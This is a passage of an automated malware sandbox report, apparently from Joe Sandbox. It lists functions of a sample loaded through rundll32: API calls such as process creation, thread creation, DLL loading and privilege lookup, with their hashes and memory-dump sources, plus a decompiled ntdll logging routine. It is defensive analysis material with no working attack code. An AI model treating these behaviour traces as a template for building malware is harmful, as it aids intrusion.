                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction ID: 646abc787fd539b59fd5131a3b47f6237336af412f2fb5839f5439d3d9f10d13
                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction Fuzzy Hash: 06E046B1200208ABDB18EF99CC49EA777ACEF88750F018558FE0C9B242C630F910CAF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00867280 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008672DA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008672FB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                                                        • Instruction ID: 36f5f2263b81d8e8213a3194a29f7080c92f4dd7e3df436e46afa0d877ed55ee
                                                                        • Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                                                        • Instruction Fuzzy Hash: 4F01A731A8022877E725A6989C03FBE776CAB40B51F154114FF08FA1C5E6A4A90547F7
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00869B30 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00869BA2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                        • Instruction ID: 3639f84a99c7820cc80a87dbefc0c71e518a38349920e9a377cad1f04c52c1a0
                                                                        • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                        • Instruction Fuzzy Hash: 7E011EB5D4020DABDB10EAA4EC42F9DB3B9EB54308F108195E91CD7285F671EB54CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0087894E Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008789A4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: acf8a4913d8c54202c107b5ee19324671d998559724f8a9d02a26c16a2dfe6ad
                                                                        • Instruction ID: 06f3c58d47c0f820e05aab25fff7926b95b5f3a6c1071609795da986175bca79
                                                                        • Opcode Fuzzy Hash: acf8a4913d8c54202c107b5ee19324671d998559724f8a9d02a26c16a2dfe6ad
                                                                        • Instruction Fuzzy Hash: A501EBB2210108ABCB08CF88CC80EEB37ADAF8C354F118208FA4DA7244C630E851CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878950 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008789A4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction ID: 9d88ddcd8bbda7e936caf006c58d03014f0f6bd001067043ba7f61348cc543d4
                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction Fuzzy Hash: EA01AFB2214108ABCB58DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00877420 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0086CCE0,?,?), ref: 0087745C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                                        • Instruction ID: 126ed623f9bca0fcec163a2aa595542ac12c1aeb3fa4879fd17944952f7e6f5b
                                                                        • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                                        • Instruction Fuzzy Hash: DCE092333903043AE330659DAC03FA7B39CEB81B24F144026FB0DEB2C1D595F80142AA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008788A0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00873526,?,00873C9F,00873C9F,?,00873526,?,?,?,?,?,00000000,00000000,?), ref: 008788CD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: 33e57a7b43f6782d0ffcd334438736da3e4aa6191a3552baf9a2252f53ce6753
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: E6E012B1200208ABDB18EF99CC45EA777ACEF88650F118558FE089B242C630F910CAB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878A40 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0086CFB2,0086CFB2,?,00000000,?,?), ref: 00878A70
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: 9d6fb1a1550eebec8ed6a490c1e9c67323e07e5964ed33463703fa0872cd5aeb
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: 79E01AB12002086BDB14DF49CC85EE737ADEF88650F018154FE0C57241C934E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0086D417 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00008003,?,?,00867C83,?), ref: 0086D44B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: f447dd9b7d707b6eb64c08ee6ca7ab5a5b220b53caadb0575800671d16b4f62f
                                                                        • Instruction ID: 9c52fcdd3f5588e98df1aa185d5079a4f67d5a75fd2e3ac727f4106eb771ec00
                                                                        • Opcode Fuzzy Hash: f447dd9b7d707b6eb64c08ee6ca7ab5a5b220b53caadb0575800671d16b4f62f
                                                                        • Instruction Fuzzy Hash: 54D05B767443406BE710EBB49C03F652785EB65745F194178F58DE77C3EA54D5018133
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0086D420 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00008003,?,?,00867C83,?), ref: 0086D44B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                        • Instruction ID: bf30be745d0a8e45c7e5b23d2973c42c60d731650106613ca9c938ddbd34770c
                                                                        • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                        • Instruction Fuzzy Hash: 03D05E627503042AE610BAA89C03F267288AB84B00F494064F948D62C3D964E9004166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0483967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 730e5b3ea94ae62bc310ebffd0c1e48b7536abf5d3c2a61ddc512962c4cabd06
                                                                        • Instruction ID: dc9097f015759aafe3e64ab419b3d593a629135af68ed921fad8f0ce0d579ed9
                                                                        • Opcode Fuzzy Hash: 730e5b3ea94ae62bc310ebffd0c1e48b7536abf5d3c2a61ddc512962c4cabd06
                                                                        • Instruction Fuzzy Hash: 64B09BB19064C5C5F711D7604608717794477D0745F17C551D2024791A577CD095F5F5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0488FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E0488FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0483CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04885720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04885720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x0488fdda
                                                                        0x0488fde2
                                                                        0x0488fde5
                                                                        0x0488fdec
                                                                        0x0488fdfa
                                                                        0x0488fdff
                                                                        0x0488fe0a
                                                                        0x0488fe0f
                                                                        0x0488fe17
                                                                        0x0488fe1e
                                                                        0x0488fe19
                                                                        0x0488fe19
                                                                        0x0488fe19
                                                                        0x0488fe20
                                                                        0x0488fe21
                                                                        0x0488fe22
                                                                        0x0488fe25
                                                                        0x0488fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0488FDFA
                                                                        Strings
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0488FE2B
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0488FE01
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: f407335509996afaea30d9a004ae27d5599c7d29fef2e09a9d3cc68495e16e87
                                                                        • Instruction ID: 20d38be33368a9e2f7678fe887ca677ea214e89b3429256c93fc27319de3fdca
                                                                        • Opcode Fuzzy Hash: f407335509996afaea30d9a004ae27d5599c7d29fef2e09a9d3cc68495e16e87
                                                                        • Instruction Fuzzy Hash: 36F0FC726001017FE6202A46DC02F337B5ADB44734F144719F714951E1EBA2F86096F5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%